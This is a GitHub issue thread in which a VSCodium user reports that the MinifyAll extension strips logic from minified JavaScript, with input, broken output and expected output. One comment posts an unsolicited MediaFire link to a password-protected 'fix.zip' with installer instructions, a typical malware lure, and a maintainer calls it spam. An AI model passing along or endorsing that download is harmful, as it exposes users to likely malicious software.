### ISSUE TITLE
MinifyAll (v2.10.0) in VSCodium (v1.92.1) destroys Javascript code

### ISSUE THREAD

**Issue by sapereaudete** [VSCodium/vscodium#2010]
**Describe the bug**
MinifyAll (v2.10.0) in VSCodium (v1.92.1) destroys Javascript code (see code example); 
See also: https://github.com/Josee9988/MinifyAll/discussions/186

**Please confirm that this problem is VSCodium-specific**
I have a reason not to use MS VSCode.
- [-] This bug doesn't happen if I use Microsoft's Visual Studio Code. It only happens in VSCodium.

**Please confirm that the issue/resolution isn't already documented**
- [x] I checked [the Docs page](https://github.com/VSCodium/vscodium/blob/master/docs/index.md) and [the Troubleshooting page](https://github.com/VSCodium/vscodium/blob/master/docs/troubleshooting.md) and my issue is not mentioned there.

**To Reproduce**
1. Install MinifyAll (v2.10.0)
2. Load a file with the following code: window.onload = function () { ;(({ logging }) => { if (logging === true) { console.clear() } let arr = [], arrSum, kb = document.querySelectorAll('#kurzbemerkt .kb') kb.forEach(k => { arr.push(k.className) }) arrSum = [...new Set(arr)] arrSum.sort().forEach(as => { if (logging === true) { console.log(as.replace('kb ', '')) } }) })({ logging: true }) }
3. Execute MinifyAll
4. Minified code is not correct; does not run: window.onload=function(){(({logging:o})=>{let e,l=[];document.querySelectorAll("#kurzbemerkt .kb").forEach((o=>{l.push(o.className)})),e=[...new Set(l)],e.sort().forEach((o=>{}))})({logging:!0})};

**Expected behavior**
window.onload=function(){(({logging:e})=>{!0===e&&console.clear();let l=[],o,c=document.querySelectorAll("#kurzbemerkt .kb");c.forEach(o=>{l.push(o.className)}),o=[...new Set(l)],o.sort().forEach(o=>{!0===e&&console.log(o.replace("kb ",""))})})({logging:!0})};
Minified with JSCompress (sep. website)

**Screenshots**
 
**Desktop (please complete the following information):**
openSUSE Leap 15.5
KDE-Plasma-Version: 5.27.9
KDE-Frameworks-Version: 5.103.0
Qt-Version: 5.15.8
Kernel-Version: 5.14.21-150500.55.73-default (64-bit)

**Additional context**

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sapereaudete** [comment]
What is this?

**Comment by daiyam** [comment]
> What is this?

Spam...

**Comment by daiyam** [comment]
About your issue, as I said it's an issue with the extension.

**Comment by sapereaudete** [comment]
I would see it that way too. But at Josee9988 ( https://github.com/Josee9988/MinifyAll/discussions/186 ) nothing happens.

**Comment by sapereaudete** [comment]
Sorry, my mistake. I did not see the Isses tab at Josee9988.
